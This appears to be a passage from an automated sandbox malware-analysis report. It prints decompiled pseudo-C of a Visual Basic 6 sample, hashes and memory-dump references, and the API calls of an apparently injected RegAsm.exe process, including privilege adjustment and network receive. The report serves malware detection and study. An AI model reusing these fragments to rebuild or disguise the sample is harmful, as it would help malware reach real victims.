					_v80 = _t83;
				}
				_push(_v32);
				_push(0);
				L0040167E();
				asm("sbb eax, eax");
				_v48 =  ~( ~_t83 + 1);
				L0040166C();
				_t87 = _v48;
				if(_t87 != 0) {
					_t87 =  *((intOrPtr*)( *_a4 + 0x15c))(_a4, 0x3695);
					asm("fclex");
					_v44 = _t87;
					if(_v44 >= 0) {
						_v84 = _v84 & 0x00000000;
					} else {
						_push(0x15c);
						_push(0x40246c);
						_push(_a4);
						_push(_v44);
						L00401654();
						_v84 = _t87;
					}
				}
				_push(E0040AB15);
				return _t87;
			}

0x0040a96d
0x0040a97c
0x0040a986
0x0040a98e
0x0040a991
0x0040a998
0x0040a9a7
0x0040a9b1
0x0040a9cb
0x0040a9b3
0x0040a9b3
0x0040a9b8
0x0040a9bd
0x0040a9c2
0x0040a9c2
0x0040a9d7
0x0040a9e6
0x0040a9e9
0x0040a9eb
0x0040a9f2
0x0040aa0b
0x0040a9f4
0x0040a9f4
0x0040a9f6
0x0040a9fb
0x0040a9fe
0x0040aa01
0x0040aa06
0x0040aa06
0x0040aa12
0x0040aa21
0x0040aa27
0x0040aa29
0x0040aa30
0x0040aa4c
0x0040aa32
0x0040aa32
0x0040aa37
0x0040aa3c
0x0040aa3f
0x0040aa42
0x0040aa47
0x0040aa47
0x0040aa54
0x0040aa5b
0x0040aa6c
0x0040aa72
0x0040aa74
0x0040aa7b
0x0040aa97
0x0040aa7d
0x0040aa7d
0x0040aa82
0x0040aa87
0x0040aa8a
0x0040aa8d
0x0040aa92
0x0040aa92
0x0040aa9b
0x0040aa9e
0x0040aaa0
0x0040aaa7
0x0040aaac
0x0040aab3
0x0040aab8
0x0040aabe
0x0040aacd
0x0040aad3
0x0040aad5
0x0040aadc
0x0040aaf8
0x0040aade
0x0040aade
0x0040aae3
0x0040aae8
0x0040aaeb
0x0040aaee
0x0040aaf3
0x0040aaf3
0x0040aadc
0x0040aafc
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A986
__vbaNew2.MSVBVM60(004026C8,0040C33C,?,?,?,?,00401426), ref: 0040A9BD
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000014), ref: 0040AA01
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402918,00000140), ref: 0040AA42
__vbaFreeObj.MSVBVM60 ref: 0040AA5B
__vbaHresultCheckObj.MSVBVM60(00000000,004013D8,0040246C,000000A8), ref: 0040AA8D
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0040AAA0
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0040AAB3
__vbaHresultCheckObj.MSVBVM60(00000000,004013D8,0040246C,0000015C), ref: 0040AAEE

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$ChkstkNew2
String ID:
API String ID: 1969955383-0
Opcode ID: b5ac3e549008a4b08e8e92733b47882fe280cb26a547491543b8b51c63ff23ff
Instruction ID: 7b5c3164793b024fc7fe8034ef5bbc487d47ce1256e2a117f72c80c94e946d9b
Opcode Fuzzy Hash: b5ac3e549008a4b08e8e92733b47882fe280cb26a547491543b8b51c63ff23ff
Instruction Fuzzy Hash: 29511270A00208EFCB01EFA5C989BDDBBB0BF08715F10842AF405BA2E0D7795995DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040998C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040998C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				intOrPtr _v32;
				char _v40;
				void* _t9;
				short _t10;
				intOrPtr _t18;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t18;
				_t9 = 0x28;
				L00401420();
				_v12 = _t18;
				_v8 = 0x4012e8;
				_push(2);
				_push("ABC");
				_push(0x402938);
				_push(0);
				L00401564();
				if(_t9 != 3) {
					_push(L"Katakrese3");
					_push(0x9b);
					_push(0xffffffff);
					_push(0x20);
					L004015D6();
				}
				_v32 = 0x80020004;
				_v40 = 0xa;
				_t10 =  &_v40;
				_push(_t10);
				L0040155E();
				_v24 = _t10;
				L0040164E();
				_push(E00409A18);
				return _t10;
			}

0x00409991
0x0040999c
0x0040999d
0x004099a6
0x004099a7
0x004099af
0x004099b2
0x004099b9
0x004099bb
0x004099c0
0x004099c5
0x004099c7
0x004099cf
0x004099d1
0x004099d6
0x004099db
0x004099dd
0x004099df
0x004099df
0x004099e4
0x004099eb
0x004099f2
0x004099f5
0x004099f6
0x004099fb
0x00409a02
0x00409a07
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 004099A7
__vbaInStr.MSVBVM60(00000000,00402938,ABC,00000002,?,?,?,?,00401426), ref: 004099C7
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000009B,Katakrese3,00000000,00402938,ABC,00000002,?,?,?,?,00401426), ref: 004099DF
#648.MSVBVM60(0000000A,00000000,00402938,ABC,00000002,?,?,?,?,00401426), ref: 004099F6
__vbaFreeVar.MSVBVM60(0000000A,00000000,00402938,ABC,00000002,?,?,?,?,00401426), ref: 00409A02

Strings

Katakrese3, xrefs: 004099D1
ABC, xrefs: 004099BB

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#648ChkstkFileFreeOpen
String ID: ABC$Katakrese3
API String ID: 620541583-2512978052
Opcode ID: d6a2aa2e2409df09e8935fa8f406205461fb9fbf50097db28578a3bd10d37019
Instruction ID: 2f0a73849ab0b8b6219bacfaade63e9afd087f63bc9fa47754b516bab63f6e88
Opcode Fuzzy Hash: d6a2aa2e2409df09e8935fa8f406205461fb9fbf50097db28578a3bd10d37019
Instruction Fuzzy Hash: 33F0A4B0B80348B7D710EB958E0BF9EBA68EB04B14F60052BF101B61E2D6FD5D00876D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A272, Relevance: 12.1, APIs: 8, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040A272(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _v84;
				signed int _t55;
				signed int _t60;
				signed int _t61;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t72 = _t71 - 0xc;
				 *[fs:0x0] = _t72;
				L00401420();
				_v16 = _t72;
				_v12 = 0x401388;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401426, _t69);
				L004014F8();
				if( *0x40c33c != 0) {
					_v76 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026c8);
					L0040165A();
					_v76 = 0x40c33c;
				}
				_v48 =  *_v76;
				_t55 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v44);
				asm("fclex");
				_v52 = _t55;
				if(_v52 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026b8);
					_push(_v48);
					_push(_v52);
					L00401654();
					_v80 = _t55;
				}
				_v56 = _v44;
				_t60 =  *((intOrPtr*)( *_v56 + 0xd0))(_v56,  &_v40);
				asm("fclex");
				_v60 = _t60;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0xd0);
					_push(0x402918);
					_push(_v56);
					_push(_v60);
					L00401654();
					_v84 = _t60;
				}
				_t61 = _v40;
				_v72 = _t61;
				_v40 = _v40 & 0x00000000;
				L00401678();
				L004015E8();
				_v36 = 0xefe20c20;
				_v32 = 0x5afb;
				_push(E0040A3A9);
				L0040166C();
				return _t61;
			}

0x0040a275
0x0040a284
0x0040a28e
0x0040a296
0x0040a299
0x0040a2a0
0x0040a2af
0x0040a2b2
0x0040a2be
0x0040a2d8
0x0040a2c0
0x0040a2c0
0x0040a2c5
0x0040a2ca
0x0040a2cf
0x0040a2cf
0x0040a2e4
0x0040a2f3
0x0040a2f6
0x0040a2f8
0x0040a2ff
0x0040a318
0x0040a301
0x0040a301
0x0040a303
0x0040a308
0x0040a30b
0x0040a30e
0x0040a313
0x0040a313
0x0040a31f
0x0040a32e
0x0040a334
0x0040a336
0x0040a33d
0x0040a359
0x0040a33f
0x0040a33f
0x0040a344
0x0040a349
0x0040a34c
0x0040a34f
0x0040a354
0x0040a354
0x0040a35d
0x0040a360
0x0040a363
0x0040a36d
0x0040a375
0x0040a37a
0x0040a381
0x0040a388
0x0040a3a3
0x0040a3a8

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A28E
#554.MSVBVM60(?,?,?,?,00401426), ref: 0040A2B2
__vbaNew2.MSVBVM60(004026C8,0040C33C,?,?,?,?,00401426), ref: 0040A2CA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000014), ref: 0040A30E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402918,000000D0), ref: 0040A34F
__vbaStrMove.MSVBVM60(00000000,?,00402918,000000D0), ref: 0040A36D
__vbaFreeObj.MSVBVM60(00000000,?,00402918,000000D0), ref: 0040A375
__vbaFreeStr.MSVBVM60(0040A3A9), ref: 0040A3A3

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#554ChkstkMoveNew2
String ID:
API String ID: 787552733-0
Opcode ID: dc0cb222074cb7d6b8a3dc982decbb3aba522b7f5c902ff73f2c00751ec18b7a
Instruction ID: 9814357f940a8f2885e3632e0d0313d592268ec91636d05241c43b49cb6c41b9
Opcode Fuzzy Hash: dc0cb222074cb7d6b8a3dc982decbb3aba522b7f5c902ff73f2c00751ec18b7a
Instruction Fuzzy Hash: CC31F070900208EFCB00EFA5D989BDDBBB4BF18304F20816AE401BB2A1C7795945DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE2A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040AE2A(signed int __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				void* _t19;
				void* _t27;
				void* _t30;
				void* _t31;

				 *(_t31 + __eax * 2 - 0x73) =  *(_t31 + __eax * 2 - 0x73) << 0x45;
				asm("in al, 0x89");
				asm("lodsb");
				 *0xc7 =  *0xc7 | 0x000000c7;
				 *((intOrPtr*)(__ebx - 0x177c1fbb)) =  *((intOrPtr*)(__ebx - 0x177c1fbb)) + __ecx;
				 *__edi =  *__edi + __ecx;
				 *(__edi + 0x50000000) =  *(__edi + 0x50000000) ^ 0x0000008d;
				_t30 = _t27 + 3;
				asm("lodsb");
				_push(0xc7);
				_push(_t30 - 0x34);
				L004014B6();
				_t19 = _t30 - 0x34;
				_push(_t19);
				L004015B2();
				L00401678();
				L0040164E();
				_push(E0040AED4);
				L0040166C();
				return _t19;
			}

0x0040ae2a
0x0040ae2f
0x0040ae35
0x0040ae36
0x0040ae39
0x0040ae3f
0x0040ae41
0x0040ae48
0x0040ae49
0x0040ae4a
0x0040ae4e
0x0040ae4f
0x0040ae54
0x0040ae57
0x0040ae58
0x0040ae62
0x0040ae6a
0x0040aea9
0x0040aece
0x0040aed3

APIs

#617.MSVBVM60(?,000000C7), ref: 0040AE4F
__vbaStrVarMove.MSVBVM60(?,?,000000C7), ref: 0040AE58
__vbaStrMove.MSVBVM60(?,?,000000C7), ref: 0040AE62
__vbaFreeVar.MSVBVM60(?,?,000000C7), ref: 0040AE6A
__vbaFreeStr.MSVBVM60(0040AED4,?,?,00004008,?), ref: 0040AECE

Strings

E, xrefs: 0040AE2A

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$#617
String ID: E
API String ID: 501449635-3568589458
Opcode ID: 1adb34dd419b84f571bb7e3490ff008dc78b6b2bdc8d3ef07d231fdaa6df9504
Instruction ID: 9f66f7906999b00cf574d374f080a1a4a1cd90d6dcc64a2b994ca071ea7dae06
Opcode Fuzzy Hash: 1adb34dd419b84f571bb7e3490ff008dc78b6b2bdc8d3ef07d231fdaa6df9504
Instruction Fuzzy Hash: C4F0B46480934557C700E6B0D845D9EB7796F10304F78477BA092620E3DF3C2616C74A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 5596 Parent PID: 4708 RegAsm.exeCOMMON

Executed Functions

Function 1D2E2290, Relevance: 39.9, Strings: 31, Instructions: 1181COMMON

Download Yara Rule

Strings

X1`r, xrefs: 1D2E2D57
X1`r, xrefs: 1D2E2A2B
X1`r, xrefs: 1D2E3157
X1`r, xrefs: 1D2E2735
X1`r, xrefs: 1D2E27F3
:@9r, xrefs: 1D2E2394
X1`r, xrefs: 1D2E2A7D
X1`r, xrefs: 1D2E3173
:@9r, xrefs: 1D2E2547
X1`r, xrefs: 1D2E2944
X1`r, xrefs: 1D2E2FD1
X1`r, xrefs: 1D2E2CE3
X1`r, xrefs: 1D2E2D70
X1`r, xrefs: 1D2E2F76
X1`r, xrefs: 1D2E2FB8
X1`r, xrefs: 1D2E2967
X1`r, xrefs: 1D2E2AF1
X1`r, xrefs: 1D2E31D1
X1`r, xrefs: 1D2E2B65
X1`r, xrefs: 1D2E2F5D
X1`r, xrefs: 1D2E30EC
X1`r, xrefs: 1D2E2DB2
X1`r, xrefs: 1D2E2A09
X1`r, xrefs: 1D2E2A9F
X1`r, xrefs: 1D2E2DCB
X1`r, xrefs: 1D2E26EC
X1`r, xrefs: 1D2E2EE9
X1`r, xrefs: 1D2E31B5
:@9r, xrefs: 1D2E2385
X1`r, xrefs: 1D2E2B13
X1`r, xrefs: 1D2E29B2

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID: :@9r$:@9r$:@9r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r
API String ID: 0-2743513511
Opcode ID: 89c9539af140acfe95059fd9701f1b4e01a2ffb6db80163a9bd395a28d01d8d0
Instruction ID: 0cc7c4a728b46f26b04856e532cab272bd8dfd797c79bf17a496c3c4b239ad31
Opcode Fuzzy Hash: 89c9539af140acfe95059fd9701f1b4e01a2ffb6db80163a9bd395a28d01d8d0
Instruction Fuzzy Hash: B7A24870E002198FDB54DF78C994BAEB7F2AF85341F6180A9D50AAB390EE309D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E9938, Relevance: 23.6, Strings: 14, Instructions: 6138COMMON

Download Yara Rule

Strings

X1`r, xrefs: 1D2EEC03
X1`r, xrefs: 1D2EDD4B
X1`r, xrefs: 1D2EE172
X1`r, xrefs: 1D2EEAA0
X1`r, xrefs: 1D2EB571
X1`r, xrefs: 1D2EE162
X1`r, xrefs: 1D2EEBCF
X1`r, xrefs: 1D2EEB68
X1`r, xrefs: 1D2EE25A
._>r, xrefs: 1D2EC45F
X1`r, xrefs: 1D2EC420
X1`r, xrefs: 1D2EE3EF
X1`r, xrefs: 1D2EEB5C
X1`r, xrefs: 1D2EE2D4

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID: ._>r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r
API String ID: 0-1572794171
Opcode ID: aa42c632da41ce53b293fd114959cb9cc054f6acf7211a5e645c9c7c808efd6f
Instruction ID: 7cda5db341a858f1463fb9ecbbc4171e2bb63af886ca0c0acd136739793662b2
Opcode Fuzzy Hash: aa42c632da41ce53b293fd114959cb9cc054f6acf7211a5e645c9c7c808efd6f
Instruction Fuzzy Hash: 06C3D575D04A299FDB65CF68CD40ACAFBF2AF89300F1581E5E50CAB221D771AE858F41

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E6B90, Relevance: 23.6, APIs: 1, Strings: 12, Instructions: 829libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1D2E72E5

Strings

X1`r, xrefs: 1D2E722E
X1`r, xrefs: 1D2E6D12
X1`r, xrefs: 1D2E73C9
X1`r, xrefs: 1D2E74EA
X1`r, xrefs: 1D2E71B2
X1`r, xrefs: 1D2E739F
X1`r, xrefs: 1D2E7467
X1`r, xrefs: 1D2E6CA6
X1`r, xrefs: 1D2E6C6E
X1`r, xrefs: 1D2E71D1
X1`r, xrefs: 1D2E7438
X1`r, xrefs: 1D2E7208

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r
API String ID: 2994545307-298403118
Opcode ID: 56ff69fad9742fcd3fcc417f162e0c387c88fe2066d0410640de3a1147a8ba3f
Instruction ID: 5c8ff3ea466c5e7b329359ef96407fbf2e5f66bdb96ddf0d5683300a435d4595
Opcode Fuzzy Hash: 56ff69fad9742fcd3fcc417f162e0c387c88fe2066d0410640de3a1147a8ba3f
Instruction Fuzzy Hash: 19624D31A00629CFDF15DF64C944BDEB7F2AF88301F1185A9E909AB261EB71AD41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 2029EAEC, Relevance: 14.4, Strings: 11, Instructions: 669COMMON

Download Yara Rule

Strings

X1`r, xrefs: 2029EDCF
X1`r, xrefs: 2029F2E5
X1`r, xrefs: 2029F1B3
X1`r, xrefs: 2029EDB2
X1`r, xrefs: 2029F2AE
X1`r, xrefs: 2029EECC
X1`r, xrefs: 2029EF50
X1`r, xrefs: 2029F182
X1`r, xrefs: 2029EED8
X1`r, xrefs: 2029F1D0
X1`r, xrefs: 2029ED81

Memory Dump Source

Source File: 00000016.00000002.735581028.0000000020290000.00000040.00000001.sdmp, Offset: 20290000, based on PE: false

Similarity

API ID:
String ID: X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r$X1`r
API String ID: 0-2140989065
Opcode ID: 0608ee4a2ff3b80f2a09b2466d9df180e64bf2a136a980a46d31242660beb4a5
Instruction ID: 93f268776a3ebd50d701db8d184786a8c3b80b0ce717310e5a77d72ee4a6d5b4
Opcode Fuzzy Hash: 0608ee4a2ff3b80f2a09b2466d9df180e64bf2a136a980a46d31242660beb4a5
Instruction Fuzzy Hash: 0A428F30A00249CFEB94DFB8C994B5DBBF2AF85304F2580AAD109AF296DB35DC55CB15

Uniqueness

Uniqueness Score: -1.00%

Function 1D2EEE08, Relevance: 9.3, Strings: 7, Instructions: 561COMMON

Download Yara Rule

Strings

X1`r, xrefs: 1D2EF354
X1`r, xrefs: 1D2EF25D
:@9r, xrefs: 1D2EF3BD
X1`r, xrefs: 1D2EF213
:@9r, xrefs: 1D2EF3D8
X1`r, xrefs: 1D2EF129
X1`r, xrefs: 1D2EF14D

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID: :@9r$:@9r$X1`r$X1`r$X1`r$X1`r$X1`r
API String ID: 0-2526695439
Opcode ID: 07c0785c13f70dde0e9a7d94aac48ea81a0e8bd3955fae8e8b126efda4832426
Instruction ID: 6dd114f09ad1c93ef0a2b4c88dccf9ed6dcbff99027e72bfae2739898acc1b4d
Opcode Fuzzy Hash: 07c0785c13f70dde0e9a7d94aac48ea81a0e8bd3955fae8e8b126efda4832426
Instruction Fuzzy Hash: 19225071F002198FDB14DFB8C890B9DBBF2AF89340F668565D619EB391DA31EC418B51

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E0CA0, Relevance: 8.1, Strings: 6, Instructions: 647COMMON

Download Yara Rule

Strings

X1`r, xrefs: 1D2E141B
X1`r, xrefs: 1D2E1473
,:`r, xrefs: 1D2E0D20
X1`r, xrefs: 1D2E136D
X1`r, xrefs: 1D2E0D55
X1`r, xrefs: 1D2E1311

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID: ,:`r$X1`r$X1`r$X1`r$X1`r$X1`r
API String ID: 0-45892916
Opcode ID: 52ff6c10d0c6c8f3eefd4211ac6caf423cb9fdbe60663d73c7801bd5395d31d0
Instruction ID: aa30324930849242316852cd7e5c4a6159fc0026960318d9b8db550a90f10763
Opcode Fuzzy Hash: 52ff6c10d0c6c8f3eefd4211ac6caf423cb9fdbe60663d73c7801bd5395d31d0
Instruction Fuzzy Hash: 0F32A070F0025A8FDB05CBA8C980BADB7F2AF85340F758525E619EB391DA35DC41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E6310, Relevance: 6.9, Strings: 5, Instructions: 621COMMON

Download Yara Rule

Strings

X1`r, xrefs: 1D2E678F
X1`r, xrefs: 1D2E6857
X1`r, xrefs: 1D2E67DD
X1`r, xrefs: 1D2E6744
X1`r, xrefs: 1D2E68A1

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID: X1`r$X1`r$X1`r$X1`r$X1`r
API String ID: 0-126988213
Opcode ID: fa3e9d37a8b9db8eac1e80d2812ecbd102d926119fe064aa6bd96d4520ae6010
Instruction ID: 38c22ba8f5376bff20d7fdfa26eb733e4173c3b0edcae8fec0672c6dc8fc2262
Opcode Fuzzy Hash: fa3e9d37a8b9db8eac1e80d2812ecbd102d926119fe064aa6bd96d4520ae6010
Instruction Fuzzy Hash: EE32BC30F002159FDB54DB78C894B6EBBF2AF84305F258569D51AAB385DF35AC01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 20298320, Relevance: 5.6, Strings: 3, Instructions: 1863COMMON

Download Yara Rule

Strings

X1`r, xrefs: 202993ED
X1`r, xrefs: 202993D0
X1`r, xrefs: 20299362

Memory Dump Source

Source File: 00000016.00000002.735581028.0000000020290000.00000040.00000001.sdmp, Offset: 20290000, based on PE: false

Similarity

API ID:
String ID: X1`r$X1`r$X1`r
API String ID: 0-1589294701
Opcode ID: 1d58e86d225876866d3450ba7ca44f4a9bd4db9dbf9dee042a74dc84de893359
Instruction ID: fd6193867b18b8045bbea102e0d2f6cb71c3a141848e367cc64c14aa186aded0
Opcode Fuzzy Hash: 1d58e86d225876866d3450ba7ca44f4a9bd4db9dbf9dee042a74dc84de893359
Instruction Fuzzy Hash: 66F2AB30A002198FCB01DFB8C898B9DBBB2BF85315F2585AAD509EB256DB34ED41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01353025, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

MK|, xrefs: 01353124

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: MK|
API String ID: 3389902171-1709298920
Opcode ID: 2b94d900a03161042127812c10dc662aaf13f96fa70b81433c4639ad702f1150
Instruction ID: be384d2fb3fc084a7409095beac2e9cafb35cc4e3fc6118802ad2ed0e2ed128a
Opcode Fuzzy Hash: 2b94d900a03161042127812c10dc662aaf13f96fa70b81433c4639ad702f1150
Instruction Fuzzy Hash: BEA10A30A043429EDF659E3CC8D4F69BBA1EF56BA4F54C26DDC968B2D7C6318481C712

Uniqueness

Uniqueness Score: -1.00%

Function 1D2E4B70, Relevance: 1.7, Strings: 1, Instructions: 473COMMON

Download Yara Rule

Strings

|m]r, xrefs: 1D2E4BAC

Memory Dump Source

Source File: 00000016.00000002.732273702.000000001D2E0000.00000040.00000001.sdmp, Offset: 1D2E0000, based on PE: false

Similarity

API ID:
String ID: |m]r
API String ID: 0-4055673666
Opcode ID: c7fdf4b220b445f8a928162416b5ff6f07708eb92a0bcc1930daf472bc2c91dd
Instruction ID: bad1907c98dba73b3a4b9587771a637b78edb0393a3975e36dbcfea467808d23
Opcode Fuzzy Hash: c7fdf4b220b445f8a928162416b5ff6f07708eb92a0bcc1930daf472bc2c91dd
Instruction Fuzzy Hash: D3F1F330B042458FDB05EBB8C858B6EBBF2AFC5344F258166E915DB295EF35EC018792

Uniqueness

Uniqueness Score: -1.00%

Function 1DECAF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1DECAF87

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 5049f28471b936925760e58359e414eedc72614b2527a8f5ef31c7bf6dfe19fd
Instruction ID: 6a53fecbf0081ac87ab59fb2c7ce833c210ba46944cf51825dc4d49020a51cf8
Opcode Fuzzy Hash: 5049f28471b936925760e58359e414eedc72614b2527a8f5ef31c7bf6dfe19fd
Instruction Fuzzy Hash: 01219FB55097C4AFDB128F25DC44B52BFF4EF06214F09859AE9858F163D274D908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 1DECB0F5

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 69144e7756f2d7dd7717b69edaedb31e48e820897c242fd2c99767630f79a24a
Instruction ID: 2fb034dcea834af560e93c8091a7706864f8a8592d3e85dbcc342a9fc1ec3a22
Opcode Fuzzy Hash: 69144e7756f2d7dd7717b69edaedb31e48e820897c242fd2c99767630f79a24a
Instruction Fuzzy Hash: FE118E724093C49FDB128F14DC45A52FFB4EF06324F0980DAE9849B263D275A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DECAF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1DECAF87

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: ae0bbac94fae763a88f4ff30b559eb1261643a94eb12188ba943f38f9348a39c
Instruction ID: 68bd13690fd2eac3d2c397ba35e6c54b1ea012ff5c7c4c05ab6bdd6c0f4373f3
Opcode Fuzzy Hash: ae0bbac94fae763a88f4ff30b559eb1261643a94eb12188ba943f38f9348a39c
Instruction Fuzzy Hash: 1011ACB15007449FDB21CF65D984B67FBE4EF04721F08C5AAEE498B612D731E818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1DECA0D5

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 065fc51c66c5743b5c71570ae7a80170958cb7617966b927f2c3a703c686303f
Instruction ID: 992151fe5ccd5fd2fca1f86273a2b3ad025f36048ebd953e89160efa90a82f33
Opcode Fuzzy Hash: 065fc51c66c5743b5c71570ae7a80170958cb7617966b927f2c3a703c686303f
Instruction Fuzzy Hash: B301BC71400644DFDB21CF59DD84B56FFE0EF44725F08C4AADE489B212D675A408CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 1DECB0F5

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

